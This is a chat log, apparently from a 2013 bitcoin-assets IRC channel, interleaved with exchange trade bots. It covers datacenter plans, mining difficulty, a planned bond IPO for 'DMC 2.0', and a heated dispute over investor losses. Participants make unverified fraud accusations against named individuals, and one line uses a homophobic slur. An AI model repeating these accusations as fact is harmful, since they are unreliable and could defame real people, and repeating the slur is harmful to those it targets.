have shitty cooling and like 1 or 2 15a circuits Feb 17 18:57:37 even if you could fill the rack, it'd overheat badly Feb 17 18:57:41 solar cheaper here or more cost effective... Feb 17 18:57:48 considering on the equator Feb 17 18:57:53 maine isnt magically shitty at solar Feb 17 18:57:56 but youd need oil cooled Feb 17 18:57:57 I think Feb 17 18:58:19 sun shines diagonally across the US Feb 17 18:58:30 the line goes from arizona to maine Feb 17 18:58:40 ya we got 90 most of the time here Feb 17 18:58:56 roasting Feb 17 18:59:14 if you look at solar panel graphs, you can see the line dragging sun hours across the north to south lines Feb 17 19:00:00 so basically your miners are the hook for btc investment Feb 17 19:00:12 Bicknellski: well, that was the point Feb 17 19:00:16 I owuldnt need to convert USD to BTC Feb 17 19:00:23 the asics would have generated everything I needed Feb 17 19:00:25 I wouldnt think people look twice at rack operation Feb 17 19:00:27 thus lowering costs Feb 17 19:00:41 ya... it is a good biz model Feb 17 19:01:27 maybe you should look into that for packaging that for businesses who already have data centers Feb 17 19:01:36 they're already doomed Feb 17 19:01:47 most datacenters simply cannot handle high density computing Feb 17 19:01:58 I imagine a few miners would racked in be good to offset costs? Feb 17 19:02:11 they'd have to tear EVERYTHING out to reconfigure it like I wanted Feb 17 19:02:26 that wont fly for them Feb 17 19:02:29 it'd be cheaper just to build a new DC from scratch using an existing warehouse-type building Feb 17 19:02:36 which is what DMC's plan was Feb 17 19:02:42 target companies moving downsizing or upgrading Feb 17 19:02:52 most companies dont have DCs Feb 17 19:02:59 if they do, its really just a rack in a room Feb 17 19:03:02 they outsource Feb 17 19:03:05 they rent space Feb 17 19:03:13 the datacenter market is ALWAYS full Feb 17 19:03:20 ya been in a few state of the art ones Feb 17 19:03:22 in Singapore Feb 17 19:03:32 you know what I find ironic? Feb 17 19:03:38 google did a tour of theirs Feb 17 19:03:39 its shit Feb 17 19:03:43 lol Feb 17 19:03:50 they could double their effective rack space if they did it my way Feb 17 19:03:55 and save a lot on costs as well Feb 17 19:04:16 so you do design then Feb 17 19:04:30 yes and no Feb 17 19:04:44 I'd still need to hire a company or three to actually do the work Feb 17 19:04:48 what is your background? engineering? Feb 17 19:04:52 what Im good at is running numbers. Feb 17 19:05:46 Diablo-D3: certified audited accounts available? Feb 17 19:07:19 so will you relist on mpex? Feb 17 19:07:27 I mean is that an option? Feb 17 19:08:00 markedathome|wth: I think Im going to have to hire a lawyer and accountant too. I'm not sure what that is, sadlyyyyyyyyyyy Feb 17 19:08:03 be very interested to see what you have planned for this IPO Feb 17 19:08:10 vnc is sticking key events again Feb 17 19:08:17 Bicknellski: its going to be corporate bonds. Feb 17 19:08:43 Bicknellski: no more shares Feb 17 19:08:55 more efficient Feb 17 19:09:06 more legal Feb 17 19:09:27 nefario lied about his exchange and the legality of the shares glbse listed companies were issuing Feb 17 19:09:53 ya Feb 17 19:10:09 which is why I have to buy all of these shares back before I can start on dmc 2.0 Feb 17 19:10:26 so we lenders get a fixed interest and money back for our bonds Feb 17 19:10:32 yup Feb 17 19:10:47 ya good on ya... Feb 17 19:10:51 that shows stones Feb 17 19:10:56 ... fuck Id be pissed Feb 17 19:11:13 flip the chess board pissed Feb 17 19:11:31 something like the equiv of 5% annually over 10 years on zero coupon OID bonds Feb 17 19:11:49 denominations? Feb 17 19:11:56 have any idea? Feb 17 19:12:05 might be 1k btc each Feb 17 19:13:14 Im also upping the IPO amount from $1m USD to $10m USD Feb 17 19:13:54 ya lawyer time Feb 17 19:13:55 lol Feb 17 19:14:47 3000 USD Feb 17 19:14:48 or less Feb 17 19:14:49 It sorta feels to me as though you'd be better off with a USD listing than a btc listing. Feb 17 19:15:00 ya Feb 17 19:15:04 davos: I think Im going to accept USD as well Feb 17 19:15:10 seems pretty hard to get that much btc Feb 17 19:15:15 but the minimum investment is going to be much higher Feb 17 19:15:17 well that's not really my thought Feb 17 19:15:33 Bicknellski: well, we're at $26 Feb 17 19:15:36 my thought is you'd be trapping yourself into a 5% APY payout nominally denominated in btc Feb 17 19:15:52 ya wicked fluctuations Feb 17 19:16:02 ;;calc 10000000 / 26 Feb 17 19:16:03 384615.384615 Feb 17 19:16:10 thats only 385k BTC Feb 17 19:16:14 thats actually less than last time Feb 17 19:16:33 ;;calc 1000000 / 5 Feb 17 19:16:33 200000 Feb 17 19:16:36 or maybe not Feb 17 19:17:17 davos: yes, and what stops me from just buying 1.60x or whatever btc early into the 10 year period Feb 17 19:19:36 it could go up to $1000 Feb 17 19:19:38 and it wouldnt matter Feb 17 19:19:42 if you anticipate a long-term (10yr) general rise in the btcusd, then its not so much a problem of being unable to pay... its more an issue of profitability. If you think btc have a higher usd cost per unit in 10 years than it does now then it would make sense to have your liabilities denominated in usd Feb 17 19:20:26 ASICMINER just hit 3TH Feb 17 19:21:49 wd Feb 17 19:22:54 already found 52 blocks Feb 17 19:23:11 wow Feb 17 19:23:19 they have what? 12th? Feb 17 19:23:22 total? Feb 17 19:23:24 coming? Feb 17 19:23:26 or more Feb 17 19:23:28 it's what they get for being first Feb 17 19:25:38 more interesting I think is that they've pushed the time to block down under 8 minutes Feb 17 19:26:35 [MPEX] [S.MPOE] 4321 @ 0.00065742 = 2.8407 BTC [-] Feb 17 19:26:36 [MPEX] [S.MPOE] 16013 @ 0.00065708 = 10.5218 BTC [-] Feb 17 19:32:00 new diff today Feb 17 19:32:04 ;;bc,diffchange Feb 17 19:32:05 Estimated percent change in difficulty this period | 11.2711072217 % based on data since last change | 30.4664306956 % based on data for last three days Feb 17 19:32:26 how does one get absolute value? Feb 17 19:32:40 ;;calc [bc,diff]*1.11 Feb 17 19:32:40 3635765.69109 Feb 17 19:33:11 ;;calc [bc,diff]*1.3 Feb 17 19:33:11 4258103.96254 Feb 17 19:34:31 real diff will be closer to the "based on data since last change", i guess? Feb 17 19:34:59 [MPEX] [S.MPOE] 4321 @ 0.00065273 = 2.8204 BTC [-] Feb 17 19:35:00 [MPEX] [S.MPOE] 4321 @ 0.00065252 = 2.8195 BTC [-] Feb 17 19:35:02 [MPEX] [S.MPOE] 11390 @ 0.0006525 = 7.432 BTC [-] Feb 17 19:35:04 [MPEX] [S.MPOE] 2618 @ 0.00064653 = 1.6926 BTC [-] Feb 17 19:35:45 yea Feb 17 19:36:31 Price of BTC needs to stay high till I complete a local sale in 3 hours. Feb 17 19:36:33 :-P Feb 17 19:36:44 then crash Feb 17 19:37:09 lol... use vwap instead Feb 17 19:37:14 I am Feb 17 19:37:23 its still getting pounded Feb 17 19:38:01 that bracelet kido again :) Feb 17 19:38:05 ? Feb 17 19:38:45 nah Feb 17 19:38:53 braces (on the teeth) Feb 17 19:39:03 someone new Feb 17 19:39:13 ah Feb 17 19:41:13 CoinBr.iDiff-E will close in 4 days, not much volume, but quite interesting. The price converged at 3.8mil satoshi. Feb 17 19:41:33 [MPEX] [S.MPOE] 2722 @ 0.00065539 = 1.784 BTC [+] Feb 17 19:43:39 and 10 shares sold at 0.035 .... only one who'll have a profit going long Feb 17 19:44:17 [MPEX] [S.DICE] 300 @ 0.00654498 = 1.9635 BTC [-] Feb 17 19:44:50 [MPEX] [S.MPOE] 4321 @ 0.00064664 = 2.7941 BTC [-] Feb 17 19:44:56 [MPEX] [S.MPOE] 7249 @ 0.00064653 = 4.6867 BTC [-] Feb 17 19:44:58 [MPEX] [S.MPOE] 5000 @ 0.00064506 = 3.2253 BTC [-] Feb 17 19:45:00 [MPEX] [S.MPOE] 15552 @ 0.00064496 = 10.0304 BTC [-] Feb 17 19:45:29 [BTCTC] [S.MPOE-PT] 54 @ 0.00068 = 0.0367 BTC [-] Feb 17 19:45:37 thinking what would be reasonable collateral for next iDiff-E April... somewhere 25-35 million? Feb 17 20:07:59 ;;seen smickles Feb 17 20:07:59 smickles was last seen in #bitcoin-assets 1 week, 1 day, 15 hours, 57 minutes, and 20 seconds ago: pong Feb 17 20:08:02 boo Feb 17 20:14:14 This dump is getting exciting! Feb 17 20:15:04 [MPEX] [O.BTCUSD.P230T] 4 @ 0.02 = 0.08 BTC [-] Feb 17 20:15:33 [MPEX] [O.BTCUSD.P250T] 22 @ 0.0559673 = 1.2313 BTC [-] Feb 17 20:16:16 [12:19:43] if you anticipate a long-term (10yr) general rise in the btcusd, then its not so much a problem of being unable to pay... its more an issue of profitability. If you think btc have a higher usd cost per unit in 10 years than it does now then it would make sense to have your liabilities denominated in usd Feb 17 20:16:22 I dont anticipate it Feb 17 20:16:26 [MPEX] [O.BTCUSD.P250T] 978 @ 0.0559673 = 54.736 BTC [-] Feb 17 20:16:44 ah Feb 17 20:16:46 davos: however, if I already have the btc, I dont need to atually worry Feb 17 20:16:49 *actually Feb 17 20:17:02 [MPEX] [S.MPOE] 4321 @ 0.00064503 = 2.7872 BTC [+] Feb 17 20:17:05 [MPEX] [S.MPOE] 4990 @ 0.00064497 = 3.2184 BTC [-] Feb 17 20:17:09 [MPEX] [S.MPOE] 7480 @ 0.00064496 = 4.8243 BTC [-] Feb 17 20:17:10 if I get 400k btc, and before 10 years is up have 400k btc Feb 17 20:17:10 [MPEX] [S.MPOE] 4309 @ 0.00064408 = 2.7753 BTC [-] Feb 17 20:17:18 [MPEX] [O.BTCUSD.P260T] 1000 @ 0.07610454 = 76.1045 BTC [-] Feb 17 20:17:20 it doesnt matter when I acquired the 400k btc Feb 17 20:17:26 at $20, $5, or $1000 Feb 17 20:17:28 as long as its paid Feb 17 20:20:13 [MPEX] [S.MPOE] 8241 @ 0.00064408 = 5.3079 BTC [-] Feb 17 20:20:17 [MPEX] [S.MPOE] 4409 @ 0.00064388 = 2.8389 BTC [-] Feb 17 20:42:59 [MPEX] [S.MPOE] 7000 @ 0.00064531 = 4.5172 BTC [+] Feb 17 20:51:27 [MPEX] [S.MPOE] 4800 @ 0.00064531 = 3.0975 BTC [+] Feb 17 20:54:47 [BTCTC] [BTC-BOND] 20 @ 0.01 = 0.2 BTC [+] Feb 17 21:16:20 [MPEX] [S.MPOE] 4321 @ 0.00065573 = 2.8334 BTC [+] Feb 17 21:16:22 [MPEX] [S.MPOE] 16966 @ 0.00065574 = 11.1253 BTC [+] Feb 17 21:16:24 [MPEX] [S.MPOE] 14850 @ 0.00065905 = 9.7869 BTC [+] Feb 17 21:16:25 [MPEX] [S.MPOE] 3900 @ 0.00066025 = 2.575 BTC [+] Feb 17 21:16:28 [MPEX] [S.MPOE] 17929 @ 0.00066046 = 11.8414 BTC [+] Feb 17 21:16:29 [MPEX] [S.MPOE] 9338 @ 0.00066093 = 6.1718 BTC [+] Feb 17 21:16:30 [MPEX] [S.MPOE] 1446 @ 0.00066206 = 0.9573 BTC [+] Feb 17 21:21:28 !bc,stats Feb 17 21:22:58 ;;bc,stats Feb 17 21:23:01 Current Blocks: 221725 | Current Difficulty: 3275464.586565617 | Next Difficulty At Block: 221759 | Next Difficulty In: 34 blocks | Next Difficulty In About: 4 hours, 24 minutes, and 38 seconds | Next Difficulty Estimate: 3654798.13107 | Estimated Percent Change: 11.58106 Feb 17 21:23:26 why iz no one doing IDIFF futures Feb 17 21:23:36 !ticker m X.IDIFF.MAR Feb 17 21:23:37 [MPEX:X.IDIFF.MAR] 1D: 0.07595 / 0.07595 / 0.07595 (8 shares, 0.61 BTC), 7D: 0.0429 / 0.04628974 / 0.07595 (78 shares, 3.61 BTC), 30D: 0.0429 / 0.06540414 / 0.089 (338 shares, 22.11 BTC) Feb 17 21:24:23 whats up with satoshidice.com Feb 17 21:24:54 [MPEX] [S.DICE] 6802 @ 0.00613002 = 41.6964 BTC [-] Feb 17 21:25:28 EskimoBob: you should be trading futures Feb 17 21:25:34 you could become a rich man Feb 17 21:25:56 Plenty of asks on X.IDIFF.MAR Feb 17 21:26:09 not enough bids Feb 17 21:26:16 I guess nobody expects Avalon actually shipped Feb 17 21:26:20 ;;bc,stats Feb 17 21:26:22 Current Blocks: 221725 | Current Difficulty: 3275464.586565617 | Next Difficulty At Block: 221759 | Next Difficulty In: 34 blocks | Next Difficulty In About: 4 hours, 13 minutes, and 40 seconds | Next Difficulty Estimate: 3654798.13107 | Estimated Percent Change: 11.58106 Feb 17 21:26:23 and BFL will in time Feb 17 21:26:48 the difficult is gonna go up but probably not high enough for a .075btc contract Feb 17 21:27:07 my bet is not Feb 17 21:27:11 check the charts... Feb 17 21:27:17 thats all asicminer Feb 17 21:27:21 3TH Feb 17 21:27:29 is asicminer coming on Feb 17 21:27:33 they also shipped 1 to garzik Feb 17 21:27:40 :D Feb 17 21:27:43 but i still think BFL will start to ship this month Feb 17 21:28:16 stupid canadians. Feb 17 21:28:29 I'm a fan of elk Feb 17 21:29:19 Bugpowder: how high do you think the difficulty will go up? Feb 17 21:29:36 By MAR? Feb 17 21:29:42 [02:24:01] Diablo-D3: before you fly to the moon and have 400K BTC, fix that fkn DMC of yours ;) Feb 17 21:29:54 EskimoBob: you missed the earlier url Feb 17 21:30:07 EskimoBob: and if you didnt realize, the 400k IS for DMC 2.0 Feb 17 21:30:12 7.0e6 Feb 17 21:30:48 2.0 Feb 17 21:31:31 Diablo-D3 is relisted? lol Feb 17 21:31:41 thestringpuller: Ive been for quite some time Feb 17 21:31:54 EskimoBob: same business model, minus the mining. Feb 17 21:32:20 the M in DMC now stands for "minus-mining" Feb 17 21:32:44 Bugpowder: future trading intrigues meeeee Feb 17 21:33:02 kakobrekla: Im changing the name to the name I had selected for the vps reselling side business of dmc that never took off Feb 17 21:33:12 who ever got those .0429 is making out with a steal if more ASICs come online Feb 17 21:33:29 That book is garbage. Feb 17 21:33:43 It's part of the startup bubble. Feb 17 21:33:45 EskimoBob: if you dont remember the business model, it was going to be a datacenter catering to high density computing customers Feb 17 21:34:08 Diablo-D3: figure out how to make it green first. Feb 17 21:34:19 EskimoBob: under the original $1m IPO, it was going to be 2-3 dozen racks, rented out for $15-25k/mo, electricity included Feb 17 21:34:37 EskimoBob: and the majority of electricity provided by company owned assets Feb 17 21:34:44 thestringpuller: I already did long ago Feb 17 21:34:51 EskimoBob: I own that book. That's how I know it's garbage. It has a few very good points in it, however the canvas is retarded as a whole. Feb 17 21:35:06 EskimoBob: ... my racks? Im confused. Feb 17 21:35:30 btw, Ill agree with thestringpuller, that book is shit Feb 17 21:35:47 Ive actually seen it mentioned by silicon valley VCers as being utter shit Feb 17 21:35:56 A business only needs 2 things, a hustle, and revenue. Feb 17 21:36:06 EskimoBob: Im assuming you dont understand what a datacenter is. Feb 17 21:36:11 thestringpuller: one thing: mvp. Feb 17 21:36:18 you can make money before the mvp Feb 17 21:36:45 EskimoBob: you're not asking me to describe my business, you're asking me to describe how datacenters work. Feb 17 21:36:51 Namworld_afk: we emailed you Feb 17 21:36:52 EskimoBob: if you want that, wait for a forum post. Feb 17 21:37:10 you're a tool, and yes, I blame you. Feb 17 21:38:00 you dont need a BOOK for that. Feb 17 21:38:30 "I went to school for it I know what I'm talking about" Feb 17 21:38:35 EskimoBob: Ill repeat what I said in here when you wernt Feb 17 21:39:04 EskimoBob: maine is near the information corridor between DC, nyc, boston, and toronto, where most of the world's internet traffic goes through Feb 17 21:39:29 EskimoBob: most DCs along this corridor are at capacity and have not accepted customers for quite some time Feb 17 21:39:48 EskimoBob: the DC market, as a whole, needs more DCs. Feb 17 21:40:05 EskimoBob: doing it in maine is cheaper, more viable, and more disaster resistant Feb 17 21:40:34 why would they go with me? because they dont really have a choice. Feb 17 21:43:27 why? Feb 17 21:43:29 it doesnt do anything Feb 17 21:45:27 EskimoBob: Im not going to do it right now Feb 17 21:46:01 nope Feb 17 21:46:11 ask me when DMC 1.0 has been closed for good. Feb 17 21:46:48 windmills Feb 17 21:47:08 EskimoBob: like I said at the beginning, its the same plan without the mining. Feb 17 21:48:05 you're mixing up "mvp" vs "everything else" Feb 17 21:48:11 I only care about the mvp Feb 17 21:48:55 EskimoBob: Im going to assume, btw, you just like to troll Feb 17 21:49:05 I already gave you a url earlier that you should have read already Feb 17 21:51:05 https://bitcointalk.org/index.php?topic=77469.msg1534415#msg1534415 Feb 17 21:52:00 gah 1016 mails deleted and im only back to 5pm last friday Feb 17 22:02:07 lol bitfunder Feb 17 22:02:20 Ukto the programmer Feb 17 22:04:04 EskimoBob: I dont think you actually read it. Feb 17 22:04:09 dub: also, wtf did you do Feb 17 22:05:44 "Given about 1691 to 1966 BTC were paid into DMC and about 1015 BTC have been paid back plus 90 BTC in dividends, between 586 and 861 BTC are still owed." "DMC has approximately between 507 and 1212 BTC in assets." Feb 17 22:06:04 Diablo-D3: wat? Feb 17 22:06:16 dub: 1016 mails deleted, still more to go Feb 17 22:07:27 yeah shit is retarded Feb 17 22:07:51 EskimoBob: so where did I lose the value? if anything, we're around breaking even. Feb 17 22:08:44 dub: where did they all come from? Feb 17 22:08:58 [MPEX] [S.MPOE] 4321 @ 0.00065161 = 2.8156 BTC [-] Feb 17 22:09:00 [MPEX] [S.MPOE] 7500 @ 0.00065155 = 4.8866 BTC [-] Feb 17 22:09:01 [MPEX] [S.MPOE] 23981 @ 0.00064864 = 15.555 BTC [-] Feb 17 22:09:02 [MPEX] [S.MPOE] 52598 @ 0.00064388 = 33.8668 BTC [-] Feb 17 22:09:33 EskimoBob: you're just bitching about YOUR case. Feb 17 22:09:56 Diablo-D3: mostly machine generated, every time an LSP flaps for eg Feb 17 22:10:08 dub: on gmail? use gmail label sorting rules Feb 17 22:10:34 lookout Feb 17 22:10:53 not on gmail? use procmail. Feb 17 22:11:16 EskimoBob: how many shares do you have? Feb 17 22:11:25 Diablo-D3: its probably hard to understand never having had a job but some things are outside ones control Feb 17 22:11:41 dub: er? Im just talking about managing your email here, dude Feb 17 22:11:49 Diablo-D3: also, lookout is a shining beacon of sanity after lotus notes Feb 17 22:12:21 dub: oh, lookout is some business thing? never heard of it Feb 17 22:13:11 outlook Feb 17 22:13:18 oh! Feb 17 22:13:20 _that thing_ Feb 17 22:13:24 fuck microsoft Feb 17 22:13:30 dude try notes Feb 17 22:13:37 Ive heard horror stories of notes Feb 17 22:13:46 you will pine for outlook (SWIDT!) Feb 17 22:13:48 btw, you CAN feed imap to procmail Feb 17 22:14:18 mutt is the one true MUA anyway Feb 17 22:14:37 I agree, but gmail really isnt that bad Feb 17 22:15:13 I used to use mutt + procmail + fetchmail back when I had a pop3 email box Feb 17 22:16:32 [BTCTC] [RSM] 9 @ 0.0099 = 0.0891 BTC [+] Feb 17 22:20:09 I believe in it a shitload more than you do, thats for sure Feb 17 22:21:30 Ive been buying it back. Feb 17 22:21:51 I already paid back 1015 BTC. Feb 17 22:22:29 That's your fault EskimoBob Feb 17 22:22:33 stop investing in stupid things Feb 17 22:22:42 lol someone's address is 1JEW Feb 17 22:22:49 yup Feb 17 22:23:09 mircea_popescu: oh man, I want that address Feb 17 22:23:15 http://blog.coinbase.com/ nice blog post, but I'm still 100BTC in limbo, "pending" transaction not included in teh blockchain. paralyzed bitcoins for 3 days now. Feb 17 22:23:27 EskimoBob: do you even have it for sale on the exchange? Feb 17 22:24:45 DeadWeasel so leave them a comment Feb 17 22:24:48 Anyone have any suggestions for things they'd like to see different about NastyFans.org? Feb 17 22:24:53 EskimoBob: THEN PUT IT FOR SALE ON THE EXCHANGE FOR THAT PRICE. Feb 17 22:24:59 I've left them a few mircea_popescu Feb 17 22:25:15 nm, their blog doesn't allow comments Feb 17 22:25:19 they know. if you read that post you realize they didn't have the coins to cover deposits Feb 17 22:25:20 how very chickenshitty. Feb 17 22:25:35 but they did over 1bn!!!1 there's grapsh!!! Feb 17 22:25:36 support emails, and reddit posts, bitcointalk posts Feb 17 22:25:39 haha Feb 17 22:25:46 they sold the same coins 3 time is what they did Feb 17 22:26:14 people continue to believe that coders are enough. Feb 17 22:26:35 sorta like thinking all moon landing needs is some riveters and welders. Feb 17 22:27:39 http://www.youtube.com/watch?v=PbcctWbC8Q0 hitler finds out he's really a 13yo faggoty kid. Feb 17 22:28:32 EskimoBob: I cant buy shares if they're not for sale. Feb 17 22:29:31 EskimoBob: yes. then put them on the exchange for that price. Feb 17 22:29:58 you're being difficult intentionally. Feb 17 22:30:05 yes, 12x over the current ask. Feb 17 22:30:11 or whatever is appropriate Feb 17 22:30:24 the buy back program will eventually reach that point Feb 17 22:31:22 nope. Feb 17 22:31:32 the only people who get to cut in line are those who want the least for their shares. Feb 17 22:31:57 *puts popcorn in microwave* Feb 17 22:32:36 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Feb 17 22:33:38 [BTCTC] [SYNERGY] 2 @ 0.089 = 0.178 BTC [+] Feb 17 22:35:00 [BTCTC] [COGNITIVE] 1 @ 0.38 BTC [+] Feb 17 22:35:16 Error: "bc," is not a valid command. Feb 17 22:35:56 [BTCTC] [B.YABMC] 1 @ 0.02091 BTC [+] Feb 17 22:36:01 1 BTC = 26.79001 U.S. dollars = 20.0254223 Euros Feb 17 22:36:36 [BTCTC] [B.YABMC] 1 @ 0.02092 BTC [+] Feb 17 22:36:55 EskimoBob: you do realize DMC was making a profit before nefario fucked it all up, right? Feb 17 22:38:26 Nefario just exposed the scams. Feb 17 22:38:35 OgNasty: yeah, his own Feb 17 22:38:39 He didn't stop anyone from doing business. Feb 17 22:38:56 Had you been invested in legitimate offerings, nothing bad would have happened. Feb 17 22:39:31 the asset issuers that had outrageous terms or just disappeared, preventing you from getting back your BTC were scams that have been exposed. Nothing more. Feb 17 22:39:43 OgNasty: remember, I only invested in glbse assets that nefario claimed to have vetted Feb 17 22:39:53 OgNasty: nefario then backpeddled and said he never claimed any such thing Feb 17 22:39:57 vetting doesn't mean foolproof Feb 17 22:40:07 who cares if they were vetted or not Feb 17 22:40:16 no it doesnt, but apparently trusting the exchange over isnt foolproof either Feb 17 22:40:17 scammers can get vetted, obviously. Feb 17 22:40:24 anyhow, dmc 2.0 has a new rule Feb 17 22:40:30 no investing in BTC companies. period. Feb 17 22:40:36 Diablo, these dudes be trolling Feb 17 22:40:46 ThickAsThieves: yes they are, and the only way to fight trolls is with facts Feb 17 22:40:47 [BTCTC] [GSDPT] 5 @ 0.0065 = 0.0325 BTC [+] Feb 17 22:41:01 that's also how you feed them Feb 17 22:41:02 Diablo-D3: Which also unfortunately doubles as a kind of food. Feb 17 22:41:08 :) Feb 17 22:41:20 I'm not trolling. I'm just fascinated why someone who ran a fund into the ground wants to start a new one. You're losing people's money claiming to be good at investments and you're obviously terrible. Feb 17 22:41:27 That's messed up dude. Find another niche. Feb 17 22:41:27 the only way to fight trolls is to punch oneself in the face Feb 17 22:42:08 OgNasty: except I never ran it into the ground Feb 17 22:42:16 OgNasty: if all things go accordingly during the shutdown, we break even Feb 17 22:42:20 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Feb 17 22:42:29 if if was a spliff your investors would all be high Feb 17 22:42:30 OgNasty: its EskimoBob trying to glue together numbers that dont belong together that is claiming this Feb 17 22:42:49 but it aint. this is real life. don't play with people's money and pretend to know what you're doing if you don't. Feb 17 22:43:07 [MPEX] [S.DICE] 300 @ 0.00654498 = 1.9635 BTC [+] Feb 17 22:43:14 EskimoBob: that number implies everyone paid at 1. Feb 17 22:43:18 everyone didnt. Feb 17 22:43:24 I didn't invest a penny with you, because it was obvious what you and usagi and goat were all up to... Feb 17 22:43:35 OgNasty: except usagi nor goat was part of dmc Feb 17 22:43:44 and I still dont know what usagi and goat were up to Feb 17 22:43:57 I just wonder how much longer the community will let people get away with passing off investments that are nothing more than someone funding their silk road habits. Feb 17 22:44:10 OgNasty: aaand now you've shifted into trolling Feb 17 22:44:43 just being an ass. Feb 17 22:45:06 midnightmagic, ThickAsThieves: btw, you missed my earlier update: https://bitcointalk.org/index.php?topic=77469.msg1534415#msg1534415 Feb 17 22:45:19 [BTCTC] [S.MPOE-PT] 5 @ 0.00068 = 0.0034 BTC [-] Feb 17 22:45:32 It just pisses me off that investment money that could be going to people making a real difference and providing the community with things is ending up in the hands of those who do nothing but leech the community. Feb 17 22:45:40 i saw that one, but this was all a bit before my time Feb 17 22:45:43 OgNasty: yes, that pisses me off too Feb 17 22:45:56 OgNasty: if the DMC IPO would have completed, BTC would be $1000 by now Feb 17 22:46:04 if Feb 17 22:46:14 i see at as, in the past some shit went down, but Diablo wants to keep his name respectable so he's doing what he can to make things right Feb 17 22:46:17 sounds fine to me Feb 17 22:46:20 everytime you use the word if, just hit the delete button and rethink your argument. Feb 17 22:46:27 OgNasty: It amuses me when people call the bitcoin users a "community". Feb 17 22:46:32 nefarios actions made me realize that what he was doing was illegal, he was giving out illegal advice Feb 17 22:46:35 if that makes people lose trust in Diablo in new ventures, just shut up and dont buy in Feb 17 22:47:00 midnightmagic: I refer to bitcointalk as the community. Feb 17 22:47:08 That is where they peddle their "investments" Feb 17 22:47:08 EskimoBob: he claimed he had a legally registered exchange in the UK. Feb 17 22:47:10 he didnt. Feb 17 22:47:30 the bitcoin assets and otc are certainly a community Feb 17 22:47:33 OgNasty: Gah, even worse. :) Feb 17 22:47:34 in that case all the community needs is a bunch of bullets Feb 17 22:47:50 [BTCTC] [S.MPOE-PT] 9 @ 0.00068 = 0.0061 BTC [-] Feb 17 22:47:51 infact, its very hard to get an exchange going AND the amount of paperwork to get a company to go public is immense Feb 17 22:48:02 something nefario also lied about Feb 17 22:48:16 EskimoBob: no he wasnt? he was raising a million btc to start building a mining farm Feb 17 22:48:21 EskimoBob: yes, but I didnt lose 98% of the _money_ Feb 17 22:48:33 if you thought that was a sane investment thats your problem Feb 17 22:48:35 whoever controlled the money lost it... Feb 17 22:48:38 [MPEX] [S.DICE] 400 @ 0.00654498 = 2.618 BTC [+] Feb 17 22:48:42 it appears that was you Feb 17 22:48:55 that's how you know you shouldn't handle other people's money Feb 17 22:48:56 OgNasty: before continuing, read this: https://bitcointalk.org/index.php?topic=77469.msg1534415#msg1534415 Feb 17 22:49:21 it's the people that shouldn't send it to him. Feb 17 22:49:39 if he gets rich off their ignorance, fuck it. Feb 17 22:49:53 expecting people to be honest in business is dumb. Feb 17 22:49:56 DeadWeasel: hey now, I never made a dime off this. Feb 17 22:50:05 I think I really was the only honest one here. Feb 17 22:50:20 D3: I understand what happened. You made terrible investments. I'm not saying you should burn. I'm saying you should stop taking other people's money because it's been proven you're terrible at it. Feb 17 22:50:22 probably, i realize you are paying back, i'm just trying to direct these people's anger Feb 17 22:50:29 so misplaced. Feb 17 22:50:42 OgNasty: except the only outright failure of an investment is BTC-MINING. Feb 17 22:50:44 same goes to usagi, goat, giga, and everyone else who completely crashed their holdings when GLBSE went down and still clings to that defense. Feb 17 22:51:01 er, why are you putting giga in there? Feb 17 22:51:04 he actually owns a farm Feb 17 22:51:12 i have a farm, on hay day Feb 17 22:51:18 i just got pigs. Feb 17 22:51:28 doopy doo. Feb 17 22:51:42 giga took people's money and won't give it back unless you jump through hoops. he's using glbse going down to take people's money Feb 17 22:51:58 giga never owned the hardware behind the bonds he sold. Feb 17 22:51:58 OgNasty: yes, you have to now comply with US Federal law Feb 17 22:51:59 not yet. i can't find enough wood planks to upgrade my silo Feb 17 22:52:08 he sold perpetual bonds that are now expiring... Feb 17 22:52:08 OgNasty: giga got trapped the way I did. Feb 17 22:52:19 trapped behind an easy excuse. Feb 17 22:52:22 that is all Feb 17 22:52:31 at least Im ignoring it and buying back the shares Feb 17 22:52:42 EskimoBob: nice try, failtroll Feb 17 22:53:07 OgNasty: what Im trying to say is, giga did something ELSE wrong Feb 17 22:53:22 OgNasty: goat and usagi sold shares into assets that didnt exist and may have never existed Feb 17 22:53:30 yes, as did giga Feb 17 22:53:43 giga had assets of his own and was also selling upgrades into the asset Feb 17 22:53:58 giga never owned enough hashing power to back gigamining Feb 17 22:54:05 Im not sure if he did or not Feb 17 22:54:07 fact Feb 17 22:54:22 that is why I'm not saying D3 is a scammer Feb 17 22:54:28 D3 didn't do anything scammy. Feb 17 22:54:37 He just apparently is TERRIBLE with money. Feb 17 22:54:59 haha, wackadoos. the lot of us. Feb 17 22:55:05 OgNasty: its not that Im terrible iwth it, its that I believed people in bitcoin wanted to leave all the scammy wall street shit behind Feb 17 22:55:05 SO STOP GIVING HIM YOUR MONEY and it's problem solved. By continuing to take investment D3, you are being dishonest about your abilities to the community at the very least. Feb 17 22:55:38 omg gosh Feb 17 22:55:42 that was quite a big moce Feb 17 22:55:43 move Feb 17 22:55:47 believing obvious scams and investing in them = terrible with money Feb 17 22:55:49 hello? Feb 17 22:55:57 OgNasty: I never invested in any of these obvious scams Feb 17 22:56:01 [MPEX] [S.MPOE] 4321 @ 0.00066187 = 2.8599 BTC [+] Feb 17 22:56:02 [BTCTC] [B.YABMC] 9 @ 0.02092 = 0.1883 BTC [+] Feb 17 22:56:04 [MPEX] [S.MPOE] 4321 @ 0.00066192 = 2.8602 BTC [+] Feb 17 22:56:05 [BTCTC] [B.YABMC] 250 @ 0.02092 = 5.23 BTC [+] Feb 17 22:56:07 didn't you say you owned usagi funds? Feb 17 22:56:08 not a dime of DMC money went to bfl or bitcoinica Feb 17 22:56:08 [MPEX] [S.MPOE] 7158 @ 0.00066206 = 4.739 BTC [+] Feb 17 22:56:09 [MPEX] [S.MPOE] 7158 @ 0.00066206 = 4.739 BTC [+] Feb 17 22:56:11 OgNasty: nope Feb 17 22:56:15 never invested in usagi either Feb 17 22:56:25 infact usagi supposidly owned a lot of dmc shares Feb 17 22:56:37 EskimoBob: I already answered that in full Feb 17 22:56:47 you just dont like the answer because you have to wait longer than everyone else. Feb 17 22:57:03 where is it? is a simple question. Feb 17 22:57:09 it deserves a simple answer Feb 17 22:57:19 "I lost it with bad investments." would be a simple answer Feb 17 22:57:20 OgNasty: did you read the forum post I told you to read? Feb 17 22:57:38 simple answer is what I'm looking for Feb 17 22:57:49 I don't even care to be honest. Feb 17 22:58:18 I just am fascinated by the whole concept of failed asset issuers continuing to operate freely without being constantly flamed for it. Feb 17 22:58:19 OgNasty: between 1691 and 1966 